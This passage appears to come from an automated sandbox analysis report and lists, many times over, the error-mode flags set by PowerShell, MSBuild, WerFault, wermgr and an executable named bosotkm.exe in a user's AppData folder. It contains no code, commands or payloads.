                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
